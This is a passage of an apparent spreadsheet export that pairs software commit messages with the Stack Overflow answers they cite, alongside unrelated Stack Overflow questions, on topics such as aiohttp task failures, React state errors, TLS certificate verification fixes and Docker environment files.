&lt;p&gt;Inside &lt;code&gt;send_order_request&lt;/code&gt; we create a entry on a table called &lt;code&gt;Transaction&lt;/code&gt; with the order id and the corresponding order amount and in pending state and send  http request using &lt;code&gt;aiohttp.CLient&lt;/code&gt; library. Afterwards we update the transaction status to Success if the request response is succesful and to error if the request fails.&lt;/p&gt;
&lt;p&gt;So the problem we are facing is that when our system is with a relative amount of load in our pods when the pod uses 70% of the CPU limits we give to them we notice that some of our tasks simply break execution and don't inform the event loop about any possible error.&lt;/p&gt;
&lt;p&gt;We discovered this because after some load testing we ran some scripts to check transaction status and noticed that some order id's only had the transaction status to pending so they didn't even execute the request to the external api. Furthermore we noticed that for all the orders that were in this state they didn't appear in the succes task log:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;print(f&amp;quot;âœ… Task '{task.get_name()}' succeeded with result: {result}&amp;quot;).
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and they also don't appear on the error task log:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;print(f&amp;quot;âš ï¸ Task '{task.get_name()}' raised an exception: {result}&amp;quot;).
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Furthermore we also turned the &lt;code&gt;event loop&lt;/code&gt; logs debug to true and don't find any kind of error associated with these tasks. The only thing we found out is that the execution reaches this log:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;logger.debug(f&amp;quot;Sending order details with success for order: {order.id}&amp;quot;) 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and that the transaction state for this order is created with &lt;code&gt;pending&lt;/code&gt; state but is never updated again.&lt;/p&gt;
&lt;p&gt;Does anyone have any idea why these cases may be happening?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import asyncio
import aiohttp
async def stack_overflow_script(active_orders):
    order_details_tasks = [
            asyncio.create_task(
                launch_individual_order_details(order),
                name=f&amp;quot;task_order_{order}&amp;quot;,
            )
            for order in active_orders
        ]
    results = await asyncio.gather(*order_details_tasks, return_exceptions=True)
    for task, result in zip(order_details_tasks, results):
        if isinstance(result, Exception):
            print(f&amp;quot;âš ï¸ Task '{task.get_name()}' raised an exception: {result}&amp;quot;)
        else:
            print(f&amp;quot;âœ… Task '{task.get_name()}' succeeded with result: {result}&amp;quot;)
async def launch_individual_order_details(order):
    print(f&amp;quot;Sending round details for play: {order}&amp;quot;)
    await send_order_request(order)
async def send_order_request(order):
    params = dict(order_id=order)
    try:
        async with aiohttp.ClientSession(
        ) as session:
            async with session.request(
                    &amp;quot;POST&amp;quot;,
                    url=&amp;quot;https://stack-mre.free.beeceptor.com/order&amp;quot;,
                    timeout=10,
                json=params
            ) as resp:
                resp_json = await resp.json()
                return resp_json
    except asyncio.TimeoutError:
        return
asyncio.run(stack_overflow_script([2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Above is a minimal reproducable script of what I want to achieve. I don't know if when running this script my problem will occur but what I want to share is that sometimes some of this tasks don't execute and simply vanish from the thread event loop without even giving an error back to the execution.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C148</t>
  </si>
  <si>
    <t>Using radio button from Materia UI.
For controlling the input from this error `A component is changing a controlled input to be uncontrolled` nullish coalescing operator (??) was applied. Reference: https://stackoverflow.com/questions/55429442/material-ui-select-component-a-component-is-changing-a-controlled-input-of-type</t>
  </si>
  <si>
    <t>With my case I had to set a default value on the Controller component
&lt;Controller
  name="stackoverflow"
  rules={{ required: 'Please select a stackoverflow' }}
  control={control}
  defaultValue={''} // &lt;---------- HERE
  render={({ field, fieldState }) =&gt; {
    return (
      &lt;FormControl&gt;
        &lt;InputLabel id="stackoverflow-label"&gt;stackoverflow&lt;/InputLabel&gt;
        &lt;Select
          id="stackoverflow-select"
          label="stackoverflow"
          labelId="stackoverflow-id"
          error={!!fieldState.error}
          {...field}
        &gt;
         &lt;MenuItem value={i ?? ''} key={i}&gt;
                {i}
         &lt;/MenuItem&gt;
        &lt;/Select&gt;
        {fieldState.error ? (
          &lt;FormHelperText error&gt;
            {fieldState.error?.message}
          &lt;/FormHelperText&gt;
        ) : null}
      &lt;/FormControl&gt;
    );
  }}
/&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">RDBMS packages today offer a tremendous amount of functionality beyond standard data storage and retrieval.  SQL Server for example can send emails, expose web service methods, and execute CLR code amongst other capabilities.  However, I have always tried to limit the amount of processing my database server does to just data storage and retrieval as much as possible, for the following reasons:
A database server is harder to scale than web servers
In a lot of projects I've worked on, the DB server is a lot busier than the web servers, and thus has less spare capacity
It potentially exposes your database server to a security attack (web services for example)
My question is, how do you decide how much functionality or code should be implemented directly on your database server versus other servers in your architecture?  What recommendations do you have for people starting new projects?
</t>
  </si>
  <si>
    <t>C149</t>
  </si>
  <si>
    <t>Fixed console error "Cannot update a component (App) while renderin
g a different component"
I was getting this when trying to navigate to the Game result page inside the getGameResult function; I was calling this function inside a nested turnary operator.
According to the accepted reply here https://stackoverflow.com/questions/62236000/cannot-update-a-component-app-while-rendering-a-different-component, the error message will be displayed if parent (App) states are set while rendering children.
I fixed this by adding the navigation inside a useEffect hook.</t>
  </si>
  <si>
    <t>The error message will be displayed if parent (App) states are set while rendering children (Knob).
In your case, while App is rendering, Knob's
onChange()
is triggered when loaded, which then calls
this.handleOnChange()
and then
this.props.handleChangePan()
having App's
setPanLevel()
.
To fix using
useEffect()
:
In
knob.js
, you can store
panLevel
as state first just like in App, instead of direct calling
this.props.handleChangePan()
to call App's
setPanLevel()
.
Then, use
useEffect(_=&gt;props.handleChangePan(panLevel),[panLevel])
to call App's
setPanLevel()
via
useEffect()
.
Your knob.js will look like this:
function Knob(props){
  let [panLevel, setPanLevel] = useState(50);
  useEffect(_=&gt;{
    props.handleChangePan(panLevel);
  }, [panLevel]);
  return *** Knob that does not call props.handleChangePan(), but call setPanLevel() instead ***;
}
setState()
called inside
useEffect()
will be effective after the render is done.
In short, you cannot call parent's
setState()
outside
useEffect()
while in first rendering, or the error message will come up.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Considering this very simple code:&lt;/p&gt;
&lt;pre class="lang-typescript prettyprint-override"&gt;&lt;code&gt;type ExempleType = {
  someProperty?: string[];
};
const someVar: ExempleType = { someProperty: [] };
someVar.someProperty.push('test'); // =&amp;gt; 'someVar.someProperty' is possibly 'undefined'.ts(18048)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I don't understand why typescript returns the error on this last line. &lt;code&gt;someProperty&lt;/code&gt; &lt;strong&gt;cannot&lt;/strong&gt; be undefined since it was explicitly defined.&lt;/p&gt;
&lt;p&gt;If I slightly update the code and define &lt;code&gt;someProperty&lt;/code&gt; just after the variable instantiation, it works:&lt;/p&gt;
&lt;pre class="lang-typescript prettyprint-override"&gt;&lt;code&gt;type ExempleType = {
  someProperty?: string[];
};
const someVar: ExempleType = {};
someVar.someProperty = [];
someVar.someProperty.push('test'); // =&amp;gt; No error!
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This looks like a bug in Typescript to me... But on another end, I would expect such a bug to be caught (and fixed) very quickly, so it's probably not a bug.&lt;/p&gt;
&lt;p&gt;So did I miss something that could explain this error?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C15</t>
  </si>
  <si>
    <t>Support different env files for dev and prod
In the past the Postgres password was set using the .env file in the
project main folder. Variables set there could be reused
in the docker compose file in the "environment" section. Veriables set
in .env files that are specified using the "env_file" in the compose
file itself can't be directly accessed in the "environment" section
of the compose file, see https://stackoverflow.com/a/51527492/166229
That's why I now fetch the POSTGRES_PASSWORD in the Django file
directly.</t>
  </si>
  <si>
    <t>There are two aspects of your problem:
if you want to use the environment vars in docker-compose.yml file, you have to put them in file named .env as stated here: https://docs.docker.com/compose/environment-variables/#the-env-file
you can use the env_file configuration option to use any file with variables definitions as described here: https://docs.docker.com/compose/environment-variables/set-environment-variables/#use-the-env_file-attribute BUT! they will be visible only in containers, not in the docker-compose.yml file.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I ran the &lt;code&gt;git:clone&lt;/code&gt; command in VS Code command palette to clone a repository from GitHub. Where is the repo getting cloned to? VS Code is running locally on my laptop. I am on a Windows machine. Why am I seeing &lt;code&gt;/home/vscode/&lt;/code&gt; path as a destination on Windows?&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/btZ4d0Ur.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/btZ4d0Ur.png" alt="VS Code shows /home/vscode/ as destination path" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;the context of the question is that I am trying to set an environment for &lt;code&gt;python&lt;/code&gt;. I was not able to do so as I saw projects path as &lt;code&gt;/home/vscode&lt;/code&gt; whereas my python library was in &lt;code&gt;c:\....\..&lt;/code&gt; I had to download the code as &lt;code&gt;zip&lt;/code&gt; (instead of using &lt;code&gt;git clone&lt;/code&gt; and extract is locally to make the code work.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C150</t>
  </si>
  <si>
    <t>Fix bug inside fast-render module with Meteor 1.6.
The module changed an internal Meteor variable. This commit
fixes this issue by modifying the fast-render module,
see https://stackoverflow.com/a/45660021</t>
  </si>
  <si>
    <t>Check this answer for more information about the reason of this error.
Unfortunately the fast-render package that flow-router has as a dependency is messing around with meteor internals and would break your code as meteor's core code gets updated.
You can clone and edit kadira's fast-render and fix this problem.
Go to packages folder under your project's directory
cd your_project_dir/packages/
git clone https://github.com/kadirahq/fast-render.git
Then, edit your_project_dir/packages/fast-render/lib/server/context.js like so on line 23:
// support for Meteor.user
// Fibers.current._meteor_dynamics = {};
Fibers.current._meteor_dynamics = []; // &lt;-- Fixed
Now this will overwrite kadira's v2.16.0 fast-render package.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm taking on the re-architecting of a pair of applications which use [external-link] in one case, and a combination of Hibernate and a Java [external-link] (specifially [external-link]) in the second.
A key issue in the rearchitecting is to improve performance, so I'm wondering whether there's any value in bringing in a [external-link] for the design and development of the application.
Note that I'm not questioning the value in having a DBA involved in managing the production databases. But in past projects, it's been essential to have a good DBA involved in the design and coding phases, working out ways to optimize the data structures, putting code into stored procedures, etc.
But given that the database structures are almost completely managed by Hibernate and JackRabbit, there's not much scope to optimize them. Sure, if we find they don't perform well a DBA could potentially identify issues and we could submit patches to improve them, but I don't know that we would want (or be able) to do much in the way of application-specific tuning.
Another reason for wondering about the role of a DBA in this type of application is that the bulk of our performance issues are most likely above the persistence layer, i.e. it's not that the database, hibernate, or JackRabbit are too slow, it's that the way we have structured our data and push it around is not very good. Fixing this will involve data modeling, but the implementation medium is XML files and Java code rather than database tables and SQL. Does a DBA typically know much about this type of thing?
The thing that keeps me from completely dismissing the need for a DBA in the design and development of an application built on top of a persistence layer is skepticism. I don't quite believe that the need for database optimization for a specific application is complely waved away by using a pre-packaged solution.
Am I missing key points? Can a skilled DBA tweak hibernate configuration files to make things blazingly fast for my app's specific use cases? Is it madness to consider running a high load Hibernate app without having a DBA manually tune the DB itself, building indices, etc.? Or is there a new creature in the development landscape who specializes in optimizing XML-based data models and abstracted persistence layers?
</t>
  </si>
  <si>
    <t>C151</t>
  </si>
  <si>
    <t>requests ssl security issue
http://stackoverflow.com/a/29202163</t>
  </si>
  <si>
    <t>The docs give a fair indicator of what's required.
, however
requests
allow us to skip a few steps:
You only need to install the
security
package extras
(thanks @admdrew for pointing it out)
$ pip install requests[security]
or, install them directly:
$ pip install pyopenssl ndg-httpsclient pyasn1
Requests will then automatically inject
pyopenssl
into
urllib3
If you're on ubuntu, you may run into trouble installing
pyopenssl
, you'll need these dependencies:
$ apt-get install libffi-dev libssl-dev</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a corrupted DB, I do not know the cause, it is a DB of an application whose distributor never had this kind of corruption.&lt;/p&gt;
&lt;p&gt;So I tried DBCC with REPAIR_ALLOW_DATA_LOSS as suggested in:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://stackoverflow.com/questions/22830952/an-inconsistency-was-detected-during-an-internal-operation-in-database/22831143#22831143"&gt;An inconsistency was detected during an internal operation in database&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;but it does not work.&lt;/p&gt;
&lt;p&gt;What else can I try? I saw that tools that promise DB fix exist (first found in google search &lt;a href="https://www.stellarinfo.com/gdc/sql/sql-server-database-repair-tool.php" rel="nofollow noreferrer"&gt;https://www.stellarinfo.com/gdc/sql/sql-server-database-repair-tool.php&lt;/a&gt;), but I wonder should I delegate to a blackbox the destiny of my db? Ok I can take a backup of course, but before purchasing in dispair a tool I'd like to ask for more advice. Or these tools simply run DBCC and are therefore useless...&lt;/p&gt;
&lt;p&gt;This is the type of errors &lt;code&gt;DBCC CHECKDB('My_DB') WITH NO_INFOMSGS, ALL_ERRORMSGSshows&lt;/code&gt; shows me (I have many of these)&lt;/p&gt;
&lt;blockquote&gt;
&lt;pre&gt;&lt;code&gt;Msg 8939, Level 16, State 98, Line 7
Table error: Object ID 0, index ID -1, partition ID 0, alloc unit ID 3759437827725787136 (type Unknown), page (13558:888026339).
Test (IS_OFF (BUF_IOERR, pBUF-&amp;gt;bstat)) failed. Values are 133129 and -14.
&lt;/code&gt;&lt;/pre&gt;
&lt;/blockquote&gt;
&lt;p&gt;Trying to repair data loss  with&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ALTER DATABASE TW SET SINGLE_USER WITH ROLLBACK IMMEDIATE;
BEGIN TRANSACTION;
    DBCC CHECKDB ('My_DB', REPAIR_ALLOW_DATA_LOSS);
    ALTER DATABASE TW SET MULTI_USER;
COMMIT;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;i have:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Msg 8939, Level 16, State 98, Line 3 Table error: Object ID 0, index
ID -1, partition ID 0, alloc unit ID -9222773885349068800 (type
Unknown), page (15657:-1933734559). Test (IS_OFF (BUF_IOERR,
pBUF-&amp;gt;bstat)) failed. Values are 2057 and -4.
Repairing this error requires other errors to be corrected first.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;What can I do?&lt;/p&gt;
&lt;p&gt;I also realized that querying specific table records i see that some BLOBs are corrupted. Does deleting records solve this kind of pronlems?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C152</t>
  </si>
  <si>
    <t>Do verify SSL/TLS certificates when using cURL
This is a security vulnerability fix. I've mailed it to you, but was told to just make a public PR, so I'll do.
In line
https://github.com/q2a/question2answer/blob/1af307ebab9c46fb61a4ec7a0640030bf132d8b4/qa-include/qa-base.php#L1884
you set CURLOPT_SSL_VERIFYPEER to false.
According to the official CURL doc (https://curl.haxx.se/libcurl/c/CURLOPT_SSL_VERIFYPEER.html) that means it disables verifying of the peer SSL/TLS certificate completly.
As the warning there also explains this allows man-in-the-middle attacks. Thus, any request to a HTTPS URL that usually is secured by HTTPS is basically broken by default in Q2A.
IMHO this should never be the case. Even if some people may e.g. use broken cooperate proxies or so, this should still be no reason to disable it by default for anyone.
It should at most be an optional setting (opt-in) and mentioned/explained somewhere (in the documentation) what it does.
Implications: As I'm not exactly sure where this is all used, I can only guess. But as I know it is used for update checking the plugins, an attacker may e.g. fake the result and always respond with the current version, so one could prevent the admin from knowing there is a new version of a plugin available. And if a plugin e.g. fixed a security vulnerability, this may then prevent admins from getting to know of the update.
Even if there were no immediate security risk caused by this, it is just not required to disable such a powerful security feature. So if it is done, it really needs a good reasoning/explanation as it is potentially a big security issue.
Solution: My proposal would be just to remove this line in order to enable certificate verification again. (Even if an admin would want to disable it, they could still do it.)
And if it is an issue with an outdated CaCert.pem bundle, admins should just be enoucuraged to update it, which can be done manually even. See https://stackoverflow.com/questions/2694787/how-can-i-set-curlopt-cainfo-globally-for-php-on-windows and the first comment on this PHP doc (https://www.php.net/manual/en/function.curl-setopt.php#110457).
Also BTW, the current behaviour is inconsistent with the fallback to `file_get_contents`, which always verifies certificates.</t>
  </si>
  <si>
    <t>I found the answer here (in the user notes):
http://php.net/manual/en/function.curl-setopt.php
Just add this to you .ini (note: you cannot use
ini_set
, although I don't know why you would want to. Thanks @Carlton):
curl.cainfo=c:\php\cacert.pem
And get that file from:
http://curl.haxx.se/docs/caextract.html
Works and you aren't opening yourself up for MITM attacks</t>
  </si>
  <si>
    <t xml:space="preserve">I'm developing an application for an internal customer.  One of the requirements is that it be developed in such a way that it could potentially be sold to other organizations.  The application is a tracking application for a fund-raising organization that will manage their donations, donors, participants, and events.  I already know that I'll need to develop a plugin architecture for authentication (authorization will be handled internally) and to derive demographic data from an external directory.
The application will be built on ASP.NET/C#/Linq/SQL Server.  At this point I'm not really open to supporting alternative databases, but I'm thinking I could do this in the future via different Linq drivers, if necessary.
All of the web applications that I've built to date have been custom implementations so I'd like to know if there are other things that I need to address via plugins and/or configuration items.  Any input would be helpful.
Thanks.
</t>
  </si>
  <si>
    <t>C153</t>
  </si>
  <si>
    <t>TLS 1.2 Update for Launcher
Fix for 'Could not create SSL/TLS secure channel' to springrts.com on Windows 7 and similar. Reference https://stackoverflow.com/questions/2859790</t>
  </si>
  <si>
    <t>In newer environments that support or enforce newer versions of SSL (TLS), you must add this before the code that makes an HTTP request:
// using System.Net;
ServicePointManager.Expect100Continue = true;
ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls12;
// Use SecurityProtocolType.Ssl3 if needed for compatibility reasons</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to retrieve information from our website but I can't get results with Scrapy.
At this stage of the project, I need to retrieve the training labels (for example: Validation of acquired experience)&lt;/p&gt;
&lt;p&gt;the url of the site : &lt;a href="https://monavenirpro-hdf.fr/formations/" rel="nofollow noreferrer"&gt;https://monavenirpro-hdf.fr/formations/&lt;/a&gt;&lt;/p&gt;
&lt;pre class="lang-html prettyprint-override"&gt;&lt;code&gt;&amp;lt;div class=&amp;quot;elementor-widget-wrap elementor-element-populated&amp;quot; xpath=&amp;quot;1&amp;quot;&amp;gt;
    &amp;lt;div class=&amp;quot;elementor-element elementor-element-33fed426 elementor-widget__width-auto elementor-widget elementor-widget-heading&amp;quot; data-id=&amp;quot;33fed426&amp;quot; data-element_type=&amp;quot;widget&amp;quot; data-widget_type=&amp;quot;heading.default&amp;quot;&amp;gt;
        &amp;lt;div class=&amp;quot;elementor-widget-container&amp;quot;&amp;gt;
            &amp;lt;span class=&amp;quot;elementor-heading-title elementor-size-default&amp;quot;&amp;gt;Accompagnement&amp;lt;/span&amp;gt;
        &amp;lt;/div&amp;gt;
    &amp;lt;/div&amp;gt;
    &amp;lt;div class=&amp;quot;elementor-element elementor-element-49bd7747 elementor-widget__width-auto elementor-widget elementor-widget-heading&amp;quot; data-id=&amp;quot;49bd7747&amp;quot; data-element_type=&amp;quot;widget&amp;quot; data-widget_type=&amp;quot;heading.default&amp;quot;&amp;gt;
        &amp;lt;div class=&amp;quot;elementor-widget-container&amp;quot;&amp;gt;
            &amp;lt;span class=&amp;quot;elementor-heading-title elementor-size-default&amp;quot; style=&amp;quot;&amp;quot;&amp;gt;Validation des Acquis de l'ExpÃ©rience - Livret 2&amp;lt;/span&amp;gt;        
        &amp;lt;/div&amp;gt;
    &amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would like to retrieve the informations in the span :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Accompagnement
Validation des Acquis de l'ExpÃ©rience - Livret 2
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here is my code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import scrapy
class monavenirpro(scrapy.Spider):
    name : &amp;quot;monavenirpro&amp;quot;
    start_urls = [&amp;quot;https://monavenirpro-hdf.fr/formations/&amp;quot;]
    def parse(self, response):
        libelles =  response.css(&amp;quot;div[class='elementor elementor-44463 dce-elementor-rendering-id-1'] div[&amp;quot;
                                 &amp;quot;class='elementor-element elementor-element-49bd7747&amp;quot;
                                 &amp;quot;elementor-widget__width-auto elementor-widget elementor-widget-heading'] span[&amp;quot;
                                 &amp;quot;class='elementor-heading-title elementor-size-default']::text&amp;quot;).extract()
        yield {&amp;quot;listlibelles&amp;quot;: libelles}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the terminal returns:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{'listlibelles': []}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C154</t>
  </si>
  <si>
    <t>Fix HTTPS error: Could not create SSL/TLS secure channel.
Invoke-WebRequest : The request was aborted
This seems to happen only on some machines. Possibly due to differences
in default configuration.
See also: https://stackoverflow.com/questions/41618766/</t>
  </si>
  <si>
    <t>try using this one
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri https://apod.nasa.gov/apod/</t>
  </si>
  <si>
    <t xml:space="preserve">We plan to redesign, improve our (C#) application architecture.
Anyone has some framework, hompage or book recommendations?
Mainly concerning the business logic.
</t>
  </si>
  <si>
    <t>C155</t>
  </si>
  <si>
    <t>Implement http to https redirect.
See here:
https://help.heroku.com/J2R1S4T8/can-heroku-force-an-application-to-use-ssl-tls
here:
https://kit.svelte.dev/docs/hooks#handle
and here:
https://stackoverflow.com/questions/71360354/redirecting-from-exported-handle-hook-in-sveltekit
The object is that the Heroku router will set X-Forwarded-Proto in the
request header and leaves it up to the application to check if this
value is not 'https' (is 'http' or something) and then redirect.
The second link shows how to use hooks that run on every request to
do the check and then the third link is an example of how to use
SvelteKit hooks to do a redirect.</t>
  </si>
  <si>
    <t>return new Response('Redirect', {status: 303, headers: { Location: '/login' }});
So you don't need the base url :)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt; {%- capture seo_title -%}
      {%- if request.page_type == 'search' and search.performed == true -%}
        {{ 'search.heading' | t: count: search.results_count }}:
        {{ 'search.results_with_count' | t: terms: search.terms, count: search.results_count }}
      {%- else -%}
        {{ page_title }}
      {%- endif -%}
      {%- if current_tags -%}
        {%- assign meta_tags = current_tags | join: ', ' -%}
        &amp;amp;ndash; {{ 'general.meta.tags' | t: tags: meta_tags -}}
      {%- endif -%}
      {%- if current_page != 1 -%}
        &amp;amp;ndash; {{ 'general.meta.page' | t: page: current_page }}
      {%- endif -%}
      {%- assign escaped_page_title = page_title | escape -%}
      {%- unless escaped_page_title contains shop.name -%}
        &amp;amp;ndash; {{ shop.name }}
      {%- endunless -%}
    {%- endcapture -%}
    {%- comment smartseo_integration_begin_meta_data -%}&amp;lt;title&amp;gt;{{ seo_title | strip }}&amp;lt;/title&amp;gt;{%- endcomment smartseo_integration_end_meta_data -%}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The seo checker is not showing the seo title in the search engine. What's going on...&lt;/p&gt;
&lt;p&gt;I tried changing the code, putting in a title tag just plain with store name&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C156</t>
  </si>
  <si>
    <t>Fix SSL security issue in the SMTP email relay code
The hostname of the SSL socket was not verified. This made the read
from the socket insecure since without verifying the hostname it may
be vulnerable to a man-in-the-middle attack as described in [1].
This issue was reported by Sam Blackshear and Jules Villard from the
Infer static analysis team at Facebook and it was detected by running
Infer [2] on the Gerrit code base.
As described in [3] Java 7 has a mechanism to verify the identity of
the certificate directly as part of the SSLSocket/SSLEngine API, and
with this change we make use of it to verify the hostname.
I discussed this with Shawn and we decided to develop this fix in open
source since the issue is in a non-critical part of Gerrit.
[1] https://www.cs.utexas.edu/~shmat/shmat_ccs12.pdf
[2] http://fbinfer.com/
[3] http://stackoverflow.com/questions/17972658/sslsocket-ignores-domain-mismatch/17979954#17979954
Change-Id: I0a06c8e4791a5cd3fa776d4a8250b889678b3c32
Signed-off-by: Edwin Kempin &lt;ekempin@google.com&gt;</t>
  </si>
  <si>
    <t>The SSL/TLS protocol specification is modular and detached from the specifications used to authenticate the remote host. These other specifications are split into two categories: verifying that the certificate itself can be trusted (RFC 3280/5280) and verifying the identity in the certificate (RFC 6125, or RFC 2818 for HTTPS).
The JSSE integrates the SSL protocol and the verification of the certificate in the
SSLSocket
(or
SSLEngine
) API, but doesn't handle the verification of the identifier (whch is equally important).
This is mainly due to the fact that the
SSLSocket
/
SSLEngine
can apply to any application protocol (e.g. HTTP, IMAP, SMTP, LDAP, ...), but the rules for verifying the identifier were in different specifications (with small variations), until RFC 6125 (which is still quite recent).
HttpsURLConnection
handles both, because it also uses a
HostnameVerifier
, which follows the HTTPS specification (RFC 2818, Section 3.1). This is done separately from the
SSLSocket
/
SSLEngine
API.
For other protocols, you may need to implement what the protocol specification says.
This being said, since Java 7, there is a mechanism to verify the identity of the certificate directly as part of the
SSLSocket
/
SSLEngine
API.
SSLParameters sslParams = new SSLParameters();
sslParams.setEndpointIdentificationAlgorithm("HTTPS");
sslSocket.setSSLParameters(sslParams);
Using this should make it throw an exception if the host name doesn't match.
There aren't major differences between HTTPS and the more uniform specifications in RFC 6125 (besides the fact that the latter considers IP addresses out of scope). Even if you're not using HTTPS, it would still generally make sense to use its identification specifications for other protocols. (Perhaps an "RFC 6125" endpoint identification algorithm might come in later versions of Java.)</t>
  </si>
  <si>
    <t xml:space="preserve">I am attempting to have a ReportHandler service to handle report creation.  Reports can have multiple, differing number of parameters that could be set.  In the system currently there are several different methods of creating reports (MS reporting services, html reports, etc) and the way the data is generated for each report is different.  I am trying to consolidate everything into ActiveReports.  I can't alter the system and change the parameters, so in some cases I will essentially get a where clause to generate the results, and in another case I will get key/value pairs that I must use to generate the results.  I thought about using the factory pattern, but because of the different number of query filters this won't work.  
I would love to have a single ReportHandler that would take my varied inputs and spit out report.  At this point I'm not seeing any other way than to use a big switch statement to handle each report based on the reportName.  Any suggestions how I could solve this better?
</t>
  </si>
  <si>
    <t>C157</t>
  </si>
  <si>
    <t>Create IAM user for sending SMTP email
More info:
https://docs.aws.amazon.com/ses/latest/DeveloperGuide/smtp-credentials.html
https://stackoverflow.com/a/67942587/9835872</t>
  </si>
  <si>
    <t>Use the following terraform code to get SES credentials -
resource "aws_iam_user" "smtp_user" {
  name = "smtp_user"
}
resource "aws_iam_access_key" "smtp_user" {
  user = aws_iam_user.smtp_user.name
}
data "aws_iam_policy_document" "ses_sender" {
  statement {
    actions   = ["ses:SendRawEmail"]
    resources = ["*"]
  }
}
resource "aws_iam_policy" "ses_sender" {
  name        = "ses_sender"
  description = "Allows sending of e-mails via Simple Email Service"
  policy      = data.aws_iam_policy_document.ses_sender.json
}
resource "aws_iam_user_policy_attachment" "test-attach" {
  user       = aws_iam_user.smtp_user.name
  policy_arn = aws_iam_policy.ses_sender.arn
}
output "smtp_username" {
  value = aws_iam_access_key.smtp_user.id
}
output "smtp_password" {
  sensitive = true
  value     = aws_iam_access_key.smtp_user.ses_smtp_password_v4
}</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking to convert a column with dates in a list [D, M, Y] to a datetime column. The below works but there must be a better way?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;new_df = pd.DataFrame({'date_parts': [[29, 'August', 2024], [28, 'August', 2024], [27, 'August', 2024]]})
display(new_df)
## Make new columns with dates
new_df = pd.concat([new_df, new_df['date_parts'].apply(pd.Series)], axis=1).rename(columns={0:'D', 1:'M', 2:'Y'})
month_map = {
'January':1,
'February':2,
'March':3,
'April':4,
'May':5,
'June':6,
'July':7,
'August':8,
'September':9,
'October':10,
'November':11,
'December':12
}
## make datetime column
new_df['release_date'] = pd.to_datetime(dict(year=new_df.Y, month=new_df.M.apply(lambda x: month_map[x]), day=new_df.D),  format='%d-%B-%Y') 
new_df.drop(columns=['D', 'M', 'Y'])
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;## Input
    date_parts
0   [29, August, 2024]
1   [28, August, 2024]
2   [27, August, 2024]
## Output
    date_parts          release_date
0   [29, August, 2024]  2024-08-29
1   [28, August, 2024]  2024-08-28
2   [27, August, 2024]  2024-08-27
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C158</t>
  </si>
  <si>
    <t>ADD: faker dependency
Problem
- There is a problem with faker v6
Solution
- Add faker-js/faker dependency according to this solution in stackoverflow https://stackoverflow.com/questions/21866285/cannot-find-module-faker-after-npm-install-save-dev</t>
  </si>
  <si>
    <t>After a yarn upgrade --latest I got this error for another reason: A 6.6.6 version has been published 13 days ago and it's totally empty (only one commit called endgame): https://www.npmjs.com/package/faker.
Is it a hack? Is it a joke? If yes, is it fun? Not sure...
To fix it simply rollback to the last version.
yarn add --dev faker@5.5.3
# or if you use npm
npm install --save-dev faker@5.5.3
Edit
Following the answer of akop below, the safest way seems to switch to faker-js
yarn remove faker
yarn add --dev @faker-js/faker
Then change your imports
import * as faker from 'faker';
// to 
import * as faker from '@faker-js/faker';
There is also a type definition for Typescript on their doc but it worked without for me: github.com/faker-js/faker
Edit 2
I spoke with the author of the package who's a fun and crazy guy. He got mad because of an intellectual property theft so he kind of destroyed his open-sourced work.
He now develops a 2000s style virtual desktop for fun buddypond.com</t>
  </si>
  <si>
    <t xml:space="preserve">What is the difference between UTF and UCS.
What are the best ways to represent not European character sets (using UTF) in C++ strings. I would like to know your recommendations for:
Internal representation inside the code
For string manipulation at run-time
For using the string for display purposes.
Best storage representation (i.e. In file)
Best on wire transport format (Transfer between application that may be on different architectures and have a different standard locale)
</t>
  </si>
  <si>
    <t>C159</t>
  </si>
  <si>
    <t>Fixed Module Dependencies
Excluded xml-apis in dependency xerces because it breaks the 'new' Java
Module System.
